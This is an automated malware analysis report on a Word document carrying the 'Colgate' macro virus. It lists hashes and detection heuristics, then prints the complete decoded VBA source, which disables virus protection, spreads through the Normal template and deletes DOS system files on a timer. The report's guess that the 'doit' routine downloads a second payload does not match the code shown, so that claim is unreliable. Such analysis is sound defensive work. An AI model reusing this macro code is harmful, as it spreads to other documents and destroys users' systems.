Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67c7aaff1687aa76…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Created: 2001-02-09 17:07:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ed80cd584b616f002493aa8e85a0cf13
SHA-1: ed7c6433793bb8d478f10faa60f372675432f788
SHA-256: 67c7aaff1687aa76af581f7aff24a29a1fe7dd43415be778096062287556e3dd
Risk score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample contains multiple high and critical severity heuristics indicating the presence of VBA macros designed to execute code. Specifically, the AutoOpen and Auto_Close macros, along with a Shell() call, suggest an attempt to run arbitrary commands. The script also attempts to copy itself to the NormalTemplate and execute a subroutine named 'doit', which is likely responsible for downloading and executing a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Trojan.Titch-6 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Titch-6
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2500 bytes
SHA-256: e3c3e91189c73c8df8d045d3bcb902c49579c644b84dcaffe384df5b13bdf853

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Colgate"
'Colgate.... badnews for a bad world
'Using your computer L8@nite is bad for you
Sub makeit()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.SaveNormalPrompt = False
Application.Options.ConfirmConversions = False
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Dim mod_count As Integer
Dim gotit As Boolean
gotit = False
mod_count = 1

For mod_count = 1 To NormalTemplate.VBProject.VBComponents.Count
  If NormalTemplate.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(2, 1) = "'colgate" Then gotit = True
Next mod_count

If Not gotit Then
  Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "colgate", wdOrganizerObjectProjectItems
End If

If NormalTemplate.Saved = False Then NormalTemplate.Save

gotit = False
mod_count = 1
For mod_count = 1 To ActiveDocument.VBProject.VBComponents.Count
  If ActiveDocument.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(1, 1) = "'Colgate.... badnews for a bad world" Then gotit = True
Next mod_count

If Not gotit Then
  NormalTemplate.VBProject.VBComponents("colgate").Export ("c:\colgate.tmp")
  ActiveDocument.VBProject.VBComponents.Import ("c:\colgate.tmp")
  ActiveDocument.SaveAs ActiveDocument.FullName
  Kill ("c:\colgate.tmp")
End If
If DatePart("h", Time) = 23 Then
  doit
End If
End Sub

Sub doit()
On Error Resume Next
Dim dosit As Boolean
Application.CommandBars("File").Enabled = False
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("View").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
Application.CommandBars("Tools").Enabled = False
Application.CommandBars("Table").Enabled = False
Application.CommandBars("Window").Enabled = False
Application.CommandBars("Help").Enabled = False
dosit = Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*")
Kill ("C:\autoexec.bat")
Kill ("C:\IO.SYS")
Kill ("C:\MSDOS.SYS")
Kill ("C:\Command.com")
End Sub
Sub AutoClose()
On Error Resume Next
makeit
End Sub

Sub AutoSave()
On Error Resume Next
makeit
End Sub

Sub AutoOpen()
On Error Resume Next
makeit
End Sub